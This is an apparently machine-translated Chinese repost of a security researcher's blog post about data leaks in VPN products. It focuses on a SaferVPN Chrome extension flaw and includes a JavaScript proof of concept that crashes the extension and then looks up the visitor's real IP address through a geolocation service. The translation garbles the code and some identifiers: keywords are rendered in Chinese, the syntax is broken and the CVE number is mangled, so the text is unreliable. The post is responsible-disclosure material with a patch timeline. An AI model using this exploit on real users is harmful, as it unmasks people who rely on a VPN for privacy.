在我上个月在Hotspot Shield的发现之后,我决定查看和审计更多VPN,看看有多少主要的VPN提供商易受信息泄露的影响。与文件描述符一起,我们决定查看3个随机的主要VPN客户端,看看我们能找到什么。我们的研究得到了隐私权倡导者vpnadvisor的支持。
我们初步选择了PureVPN、Hotspot Shield和Zenmate作为试验目标,并进行了研究。我们的发现让我们感到惊讶:在我们测试的3个VPN中,我们发现所有的VPN都泄漏敏感数据。
漏洞可能会让政府、敌对组织或个人识别用户的实际IP地址或DNS,在某些情况下会劫持用户的流量。与其他两个VPNs相比,Zenmate的漏洞有点小,但它仍然很重要。您可以在这里或这里找到漏洞的详细信息。
我们在所有测试的VPNs中发现漏洞,这一事实令人担忧,并使我们相信vpn可能不像许多人所想的那样安全。这为进一步的研究打开了大门。我们的猜测是大多数VPNs都有类似的漏洞,用户在使用vpn时应该考虑到这一点。
VPN SAFERVPN
细节
在这篇博文中,我将探讨在SaferVPN Chrome扩展中发现的漏洞。这一漏洞,cdp -2018-10308就像它一样简单,它应该帮助恶意的参与者在用户访问网站时获取诸如IP地址这样的重要信息。
当向一个不存在的服务器发出一系列同步请求时,VPN扩展很容易崩溃,让我们泄漏真正的用户ip、DNS和其他VPN应该隐藏的细节。
这是一个奇怪的bug,因为我不知道chrome的扩展会被应用到现在。我尝试过将断点通过扩展的调试器来查看是什么引起的,当它解决了许多不存在的dns查询时,它们似乎有意地终止了扩展。
这是一个在3.1.10之前的版本的PoC。
< script type = " text / javascript " >
var = document.getElementsByTagName负责人(“头”)[0];
var img = document.createElement(img);
img。src = " https://nonexistant.nonexistant.nonexistant ";
函数杀死(){
(var = 0;我< 12;我+ +){
head.appendChild(img);
}
}
杀();
窗口。onload = setTimeout(函数(){
var webService = " https://freegeoip.net/json/ ";
var = document.createElement脚本(脚本);
脚本。type = " text / javascript”;
脚本。src =网络服务+”?回调= MyIP&format = jsonp”;
document.getElementsByTagName(“头”)[0].appendChild(脚本);
},9000);
函数MyIP(响应){
. getelementbyid(“ipaddress”)。innerHTML = response.ip;
}
> < /脚本
< div id = " ipaddress " > < / div >
时间轴
Thu, 3月29日联系SaferVPN。
Thu, Apr 19 - SaferVPN patch live。
关于作者Paulos Yibelo。
原帖子@ https://securityaffairs.co/wordpress/70286/security/hotspot -保护- vpn缺陷- 2. - html
Pierluigi帕格尼尼
(安全事务- SaferVPN VPN, hacking)